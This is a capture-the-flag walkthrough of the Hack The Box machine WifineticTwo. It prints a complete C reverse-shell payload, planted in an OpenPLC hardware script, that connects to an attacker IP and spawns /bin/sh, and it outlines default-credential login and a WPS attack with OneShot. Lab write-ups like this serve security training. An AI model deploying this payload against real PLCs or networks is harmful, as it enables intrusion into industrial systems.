🫥WifineticTwo HTB Walkthrough

Reconnaissance

Scanning

I started by scanning the target machine using the following command:

nmap -A -o nmap_scan 10.10.11.245

The scan revealed several open ports:

- Port 22/tcp: OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
- Port 8080/tcp: Werkzeug/1.0.1 Python/2.7.18 (HTTP proxy)

Website Analysis

Upon accessing the website running on port 8080, I discovered that it was an OpenPLC login page. After a quick search, I found that the default credentials openplc worked for authentication.

Exploitation

Exploitation Attempt

I attempted to exploit the OpenPLC interface for remote code execution (RCE) using a known exploit for OpenPLC v3. However, the attempt failed during the login phase.

OpenPLC 3 - Remote Code Execution (Authenticated)Exploit Database

Manual Exploitation

Proceeding manually the previous exploit, I navigated to the "programs" section of the OpenPLC interface and uploaded a custom PLC program.

Next, I modified the hardware script to include a reverse shell payload and saved the changes.

#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

//-----------------------------------------------------------------------------

//-----------------------------------------------------------------------------
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};

//-----------------------------------------------------------------------------

//-----------------------------------------------------------------------------
void initCustomLayer()
{
   
    
    
}

void updateCustomIn()
{

}

void updateCustomOut()
{
    int port = 1234;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("10.10.14.105");//your ip addr

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);

    return 0;  
    
}

After setting up the reverse shell payload, I initiated a listener on port 1234 and started the PLC .

Successfully obtaining a reverse connection, I was able to retrieve the user flag.

Root Flag

I noticed that the machine name was related to Wi-Fi access points (APs). Upon checking the network interfaces, I discovered the "wlan0" interface.

Investigating further, I found an available wireless network with WPS enabled.

WPS Exploitation

I utilized a script called OneShot to exploit the WPS vulnerability.

Now, let's connect to it.

The connection is established, but there is no address.

let set it

We know that the default AP address is usually 192.168.1.1. I tried to connect to it over SSH, but it fails due to some terminal issue. Then I changed my shell.

Success!